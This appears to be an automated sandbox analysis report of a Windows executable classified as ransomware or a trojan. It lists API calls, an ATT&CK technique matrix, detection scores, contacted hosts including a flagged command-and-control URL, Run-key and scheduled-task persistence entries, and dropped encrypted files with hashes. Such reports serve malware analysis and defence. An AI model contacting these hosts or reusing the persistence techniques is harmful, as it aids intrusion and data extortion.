      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_free,_free,_free,_free,_free,_free,_free,_free,_free,2_2_0043404A
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,2_2_00438178
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_00440116
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: _wcscmp,_wcscmp,GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_004382A2
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: GetLocaleInfoW,_GetPrimaryLen,2_2_0043834F
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,2_2_00438423
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_004335E7
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: EnumSystemLocalesW,2_2_004387C8
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: GetLocaleInfoW,2_2_0043884E
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,2_2_00432B6D
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,__invoke_watson,_LcidFromHexString,GetLocaleInfoW,2_2_00437BB3
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: EnumSystemLocalesW,2_2_00437E27
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00437E83
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,2_2_00437F00
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,2_2_0042BF17
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,2_2_00437F83
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,2_2_00432FAD
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: 2_2_00427756 cpuid 2_2_00427756
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: 0_2_0049EC9B GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0049EC9B
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: 2_2_0042FE47 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,2_2_0042FE47
      Source: C:\Users\user\Desktop\bE5aaTiJM0.exeCode function: 2_2_00419F90 GetCurrentProcess,GetLastError,GetLastError,SetPriorityClass,GetLastError,GetModuleFileNameW,PathRemoveFileSpecW,GetCommandLineW,CommandLineToArgvW,lstrcpyW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcpyW,lstrcmpW,lstrcmpW,GlobalFree,lstrcpyW,lstrcpyW,OpenProcess,WaitForSingleObject,CloseHandle,Sleep,GlobalFree,GetCurrentProcess,GetExitCodeProcess,TerminateProcess,CloseHandle,lstrcatW,GetVersion,lstrcpyW,lstrcatW,lstrcatW,_memset,ShellExecuteExW,CreateThread,lstrlenA,lstrcatW,_malloc,lstrcatW,_memset,lstrcatW,MultiByteToWideChar,lstrcatW,lstrlenW,CreateThread,WaitForSingleObject,CreateMutexA,CreateMutexA,lstrlenA,lstrcpyA,_memmove,_memmove,_memmove,GetUserNameW,GetMessageW,GetMessageW,DispatchMessageW,TranslateMessage,TranslateMessage,DispatchMessageW,GetMessageW,PostThreadMessageW,PeekMessageW,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,PostThreadMessageW,PeekMessageW,DispatchMessageW,PeekMessageW,WaitForSingleObject,CloseHandle,2_2_00419F90
      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid Accounts2
      Native API
      1
      Registry Run Keys / Startup Folder
      1
      Exploitation for Privilege Escalation
      1
      Deobfuscate/Decode Files or Information
      OS Credential Dumping2
      System Time Discovery
      Remote Services11
      Archive Collected Data
      Exfiltration Over Other Network Medium2
      Ingress Tool Transfer
      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
      Data Encrypted for Impact
      Default Accounts2
      Command and Scripting Interpreter
      1
      Services File Permissions Weakness
      111
      Process Injection
      3
      Obfuscated Files or Information
      LSASS Memory1
      Account Discovery
      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth21
      Encrypted Channel
      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)1
      Registry Run Keys / Startup Folder
      2
      Software Packing
      Security Account Manager2
      File and Directory Discovery
      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
      Non-Application Layer Protocol
      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)1
      Services File Permissions Weakness
      1
      Masquerading
      NTDS24
      System Information Discovery
      Distributed Component Object ModelInput CaptureScheduled Transfer13
      Application Layer Protocol
      SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script111
      Process Injection
      LSA Secrets1
      Query Registry
      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.common1
      Services File Permissions Weakness
      Cached Domain Credentials141
      Security Software Discovery
      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync2
      Process Discovery
      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
      System Owner/User Discovery
      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
      Remote System Discovery
      Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
      System Network Configuration Discovery
      Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
      [Behavior graph: ID 679172, Sample: bE5aaTiJM0.exe, Start date: 05/08/2022, Architecture: WINDOWS, Score: 100]

      Source | Detection | Scanner | Label | Link
      bE5aaTiJM0.exe | 39% | Virustotal | | Browse
      bE5aaTiJM0.exe | 54% | ReversingLabs | Win32.Trojan.RedLine |
      bE5aaTiJM0.exe | 100% | Joe Sandbox ML | |

      Source | Detection | Scanner | Label | Link
      C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe | 100% | Joe Sandbox ML | |
      C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe | 54% | ReversingLabs | Win32.Trojan.RedLine |

      Source | Detection | Scanner | Label | Link | Download
      Source | Detection | Scanner | Label | Link
      acacaca.org | 17% | Virustotal | | Browse

      Source | Detection | Scanner | Label | Link
      http://acacaca.org/test2/get.php | 18% | Virustotal | | Browse
      http://acacaca.org/test2/get.php | 100% | Avira URL Cloud | malware |
      http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error | 0% | Avira URL Cloud | safe |
      https://we.tl/t-QsoSRIeA | 0% | Avira URL Cloud | safe |
      http://www.wikipedia.com/ | 0% | URL Reputation | safe |
      http://acacaca.org/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 | 100% | Avira URL Cloud | malware |
      https://we.tl/t-QsoSRIeAK6 | 0% | Avira URL Cloud | safe |
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      api.2ip.ua | 162.0.217.254 | true | false | | high
      acacaca.org | 58.235.189.192 | true | true | | unknown

      Name | Malicious | Antivirus Detection | Reputation
      http://acacaca.org/test2/get.php | true | 18%, Virustotal, Browse; Avira URL Cloud: malware | unknown
      http://acacaca.org/test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 | true | Avira URL Cloud: malware | unknown
      https://api.2ip.ua/geo.json | false | | high
          NameSourceMaliciousAntivirus DetectionReputation
          http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/ErrorbE5aaTiJM0.exe, 00000000.00000002.378332147.0000000004270000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000002.00000000.373064950.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000002.00000000.376120577.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000007.00000002.409983046.0000000004290000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000008.00000002.448603101.0000000004350000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000000.406644457.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000002.412239693.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000009.00000000.402920593.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000A.00000002.431402243.0000000004270000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000000.419924112.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000002.435929161.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000000.419105516.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000000.443455238.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000000.440796154.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.618738574.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000E.00000002.446247010.0000000004240000.00000040.00001000.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000000.441036729.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 
00000010.00000000.442195421.0000000000400000.00000040.00000400.00020000.00000000.sdmp, bE5aaTiJM0.exe, 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          low
          http://www.nytimes.com/bE5aaTiJM0.exe, 0000000C.00000003.544406916.00000000033C0000.00000004.00001000.00020000.00000000.sdmpfalse
            high
            https://api.2ip.ua/bE5aaTiJM0.exe, 00000010.00000002.448461853.0000000000808000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://api.2ip.ua/AbE5aaTiJM0.exe, 0000000C.00000003.617951064.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.619149998.00000000008A2000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://api.2ip.ua/geo.jsondllZbE5aaTiJM0.exe, 0000000B.00000002.436219532.0000000000778000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  http://www.youtube.com/bE5aaTiJM0.exe, 0000000C.00000003.547069468.00000000033C0000.00000004.00001000.00020000.00000000.sdmpfalse
                    high
                    https://we.tl/t-QsoSRIeAbE5aaTiJM0.exe, 0000000C.00000003.617923119.0000000000909000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.619591429.0000000000909000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: safe
                    unknown
                    http://www.wikipedia.com/bE5aaTiJM0.exe, 0000000C.00000003.546297954.00000000033C0000.00000004.00001000.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    unknown
                    http://www.amazon.com/bE5aaTiJM0.exe, 0000000C.00000003.538674983.00000000033C0000.00000004.00001000.00020000.00000000.sdmpfalse
                      high
                      http://www.live.com/bE5aaTiJM0.exe, 0000000C.00000003.543541001.00000000033C0000.00000004.00001000.00020000.00000000.sdmpfalse
                        high
                        https://api.2ip.ua/geo.jsonJbE5aaTiJM0.exe, 0000000B.00000002.436250212.00000000007A2000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          https://api.2ip.ua/geo.jsonjbE5aaTiJM0.exe, 0000000B.00000002.436250212.00000000007A2000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            http://www.reddit.com/bE5aaTiJM0.exe, 0000000C.00000003.545161091.00000000033C0000.00000004.00001000.00020000.00000000.sdmpfalse
                              high
                              http://www.twitter.com/bE5aaTiJM0.exe, 0000000C.00000003.545804124.00000000033C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                high
                                https://api.2ip.ua/SbE5aaTiJM0.exe, 0000000B.00000002.436291517.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000003.435286392.00000000007BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  https://api.2ip.ua/geo.jsonGbE5aaTiJM0.exe, 00000010.00000002.448461853.0000000000808000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    https://api.2ip.ua/UbE5aaTiJM0.exe, 0000000B.00000002.436291517.00000000007BD000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000B.00000003.435286392.00000000007BC000.00000004.00000020.00020000.00000000.sdmpfalse
                                      high
                                      https://we.tl/t-QsoSRIeAK6bE5aaTiJM0.exe, 0000000C.00000002.619614591.0000000000914000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000002.619400903.00000000008F1000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000003.618130988.00000000008F1000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000003.617889344.00000000008F5000.00000004.00000020.00020000.00000000.sdmp, bE5aaTiJM0.exe, 0000000C.00000003.617644288.0000000000914000.00000004.00000020.00020000.00000000.sdmp, _readme.txt.12.dr, _readme.txt0.12.drtrue
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://www.openssl.org/support/faq.htmlbE5aaTiJM0.exe, 00000010.00000002.448009707.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                                        high
                                        http://www.google.com/bE5aaTiJM0.exe, 0000000C.00000003.542183889.00000000033C0000.00000004.00001000.00020000.00000000.sdmpfalse
                                          high
                                          IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                          162.0.217.254 | api.2ip.ua | Canada | | 35893 | ACPCA | false
                                          58.235.189.192 | acacaca.org | Korea Republic of | | 9318 | SKB-ASSKBroadbandCoLtdKR | true
                                          Joe Sandbox Version:35.0.0 Citrine
                                          Analysis ID:679172
                                          Start date and time: 05/08/2022 11:21:08 (2022-08-05 11:21:08 +02:00)
                                          Joe Sandbox Product:CloudBasic
                                          Overall analysis duration:0h 10m 41s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Sample file name:bE5aaTiJM0.exe
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                          Number of analysed new started processes analysed:27
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • HDC enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Analysis stop reason:Timeout
                                          Detection:MAL
                                          Classification:mal100.rans.troj.evad.winEXE@18/215@6/2
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HDC Information:
                                          • Successful, ratio: 91.8% (good quality ratio 84.9%)
                                          • Quality average: 79.8%
                                          • Quality standard deviation: 31%
                                          HCA Information:
                                          • Successful, ratio: 73%
                                          • Number of executed functions: 11
                                          • Number of non-executed functions: 79
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe
                                          • Adjust boot time
                                          • Enable AMSI
                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                          • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                          • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net
                                          • Not all processes were analyzed, report is missing behavior information
                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                          Time | Type | Description
                                          11:22:27 | Task Scheduler | Run new task: Time Trigger Task path: C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe s>--Task
                                          11:22:27 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart
                                          11:22:36 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe" --AutoStart
                                          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                  Process:C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):42
                                                                                  Entropy (8bit):4.916126946588284
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:/FnIkgEWsEERacyn:/dIyocyn
                                                                                  MD5:9ADBB8FCA8C82C65BE1D9941119041F8
                                                                                  SHA1:4EB27D9087FE7C1BEAABEC8BF2B7861708F9B597
                                                                                  SHA-256:1D62E5001D5BA48A9F06F9FE578F8A1682662141C3C2FDA67886A1E944AF8C3D
                                                                                  SHA-512:D84C695C2771CFB21CBCD0FB64D0ACCCC4357C48A3687E4EF8CECE6BA1B67BC56CED8929B45CCF0988BD02F7841C2CFE084FFB2E54C7EDBB2D114E4A0442A7D1
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA..
                                                                                  Process:C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):462
                                                                                  Entropy (8bit):7.429766651505533
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:5INKHGQivAF20BZc83Gijj8fgLMEFQruH2Hpzkscii9a:524E03t2W8oLFQruWSsbD
                                                                                  MD5:4556CF625658B0008817BBC7ACD4977E
                                                                                  SHA1:CCE1F6B6207B0E0ADE6D923E6C4BF013D505C1C7
                                                                                  SHA-256:D0F9FDB6DE503A717BB494BDE897F9B11DE38AD42A16CD00314A38D90F8F7602
                                                                                  SHA-512:EF108C6EC5A68C45DE2D4E0C19916332FB8FA1C5D5A62201AC34B1EFDB0E342E62D0D15BC3A68152FBD6F5A6F5B7A662C8218591E49B57FF74D9B2A26C9AD242
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:2019/.2 .mi.d,.[........f....H.|...W@;...#Wy.....S.DQG....t~6r+....}{..bShrwf....R.LZf....m~.-.Z..:.J.At.y....22..3=..K4.0Z]....4....q.".VZF.....d...Z.....g...n(.T.+mV.mD.F5+..>.DwXb..._........v.{....W-..Q.Z.....O..9.h.....6.Pp.-.\.77..O.lj..4.o.......x.|fC18.p8{-F..k.|:*.3..O.1i"'.%..-H.u..<.YU....G...v....e.e...M.<}.vO-.=...2y#.=.b....c..g.....6=?..!k.Y....S._p0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                  Process:C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):462
                                                                                  Entropy (8bit):7.429766651505533
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:5INKHGQivAF20BZc83Gijj8fgLMEFQruH2Hpzkscii9a:524E03t2W8oLFQruWSsbD
                                                                                  MD5:4556CF625658B0008817BBC7ACD4977E
                                                                                  SHA1:CCE1F6B6207B0E0ADE6D923E6C4BF013D505C1C7
                                                                                  SHA-256:D0F9FDB6DE503A717BB494BDE897F9B11DE38AD42A16CD00314A38D90F8F7602
                                                                                  SHA-512:EF108C6EC5A68C45DE2D4E0C19916332FB8FA1C5D5A62201AC34B1EFDB0E342E62D0D15BC3A68152FBD6F5A6F5B7A662C8218591E49B57FF74D9B2A26C9AD242
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:2019/.2 .mi.d,.[........f....H.|...W@;...#Wy.....S.DQG....t~6r+....}{..bShrwf....R.LZf....m~.-.Z..:.J.At.y....22..3=..K4.0Z]....4....q.".VZF.....d...Z.....g...n(.T.+mV.mD.F5+..>.DwXb..._........v.{....W-..Q.Z.....O..9.h.....6.Pp.-.\.77..O.lj..4.o.......x.|fC18.p8{-F..k.|:*.3..O.1i"'.%..-H.u..<.YU....G...v....e.e...M.<}.vO-.=...2y#.=.b....c..g.....6=?..!k.Y....S._p0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                  Process:C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):347
                                                                                  Entropy (8bit):7.2647723039529595
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:3hb6lrc4LmRq6P9Yew5+fwZqKwibyrqqK1mKho4PX2e7jHqH6yLrQCdIyocksciD:3N6lrXL/6POq9imK1mKn/28rgQQksciD
                                                                                  MD5:87DE54805C9939D406CC3E86612FACB6
                                                                                  SHA1:88B567C9748B3294EECF751AE600A515111E659F
                                                                                  SHA-256:15AF2AE64D935A611BB9E29A0DC6BF56D9FA5DD3DF92DE9BB33CC2B9EB0383FB
                                                                                  SHA-512:469512B6D5DB2746724E10361327B3112209EAF2F38DD54C2301096ED17A01F5344C07C6A757C43ACC71EDFBD67ED9539C27587C50AB1294C28DD44E77038183
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:<root.`+?..T.g.....M...vw^.ZK.(.\.tp.1)q....A.Q.a.:.....u.C...q.......Q.k..Q....cAA.q.....2...-...!e*..._..;k3..%;...n....I,....9.Ooi.a@T..e7*.......B..q..Y.s..$....)...Z..c.Blc..{...\..wo.DNc,....Q.Q..q...+..,,...7...~....2"_.V.^.....A...,...54m._..R8.&0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                  Process:C:\Users\user\Desktop\bE5aaTiJM0.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):747520
                                                                                  Entropy (8bit):7.842662742823055
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:nCqmkJm0QpmFRBBAw356C94EnhtoLWBEmlCW85h1bmyA5qKyr3ty+SqOhUII84ko:n410QpmfBB5UEnhtjroWW/Hro+TICktO
                                                                                  MD5:5FAE11A9DDB49452B6896FD3217E9665
                                                                                  SHA1:A642378099D0AC4E1DC3E0ABE98B12BEE1992E1D
                                                                                  SHA-256:12471D61DC844208BDBE23A9749980CF1A40AD45F844449AFE55FB0F1CBBDA0B
                                                                                  SHA-512:8244571AB072B89FE10C6C8A78B0F3B62C6833054D40B327C51583CC247D1E13F8DBF4E8367CE3672A5C5C14DE8B53FCC7969BB6D78F4232EBEBE77D460768AC
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: ReversingLabs, Detection: 54%
                                                                                  Reputation:low
